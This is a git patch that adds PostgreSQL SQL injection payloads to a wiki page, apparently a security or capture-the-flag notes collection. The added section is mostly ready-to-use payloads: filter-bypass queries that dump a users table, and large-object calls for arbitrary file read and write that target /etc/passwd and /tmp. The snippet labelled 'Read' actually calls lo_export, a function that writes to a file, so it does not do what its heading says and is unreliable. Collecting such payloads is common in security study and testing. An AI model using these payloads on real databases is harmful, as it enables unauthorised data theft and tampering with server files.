From 57c6c16ef723de98dec94d63b3d21f7a39f55655 Mon Sep 17 00:00:00 2001
From: owalid <othmane.el.ayadi@gmail.com>
Date: Tue, 30 Jan 2024 13:20:06 +0100
Subject: [PATCH] Update: sqlinjection part with postgresql payload (#20)

* doc: update sqlinjection part with postgresql payload

* clean
---
 wiki/Web.md | 22 ++++++++++++++++++++++
 1 file changed, 22 insertions(+)

diff --git a/wiki/Web.md b/wiki/Web.md
index 4fdd19a..e695db0 100644
--- a/wiki/Web.md
+++ b/wiki/Web.md
@@ -121,6 +121,9 @@ username[$eq]=admin&password[$eq]=admin
 > SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
 > It generally allows an attacker to view data that they are not normally able to retrieve. - [Source](https://portswigger.net/web-security/sql-injection)
 
+
+Interesting [cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet) of Port Swigger.
+
 ## Manual
 ### Common pattern
 ```
@@ -152,6 +155,25 @@ admin", "") ON DUPLICATE KEY UPDATE password="newpasswd";
 " ; SELECT * FROM users
 ```
 
+### Interesting postgres function
+
+#### Filter bypass
+```
+query_to_xml('SELECT * FROM users', true, false, '')
+ts_stat('SELECT * FROM users')::text
+```
+
+#### Arbitrary read / write
+```
+# Read
+lo_export(31337, '/etc/passwd')
+lo_get(31337)
+
+# Write
+lo_from_bytea(31338, decode('bG9saXBvcAo=', 'base64'))
+lo_export(31338, '/tmp/lolipop')
+```
+
 ## SQLmap
 > SQLmap is a tool that automates the process of detecting and exploiting SQL injection.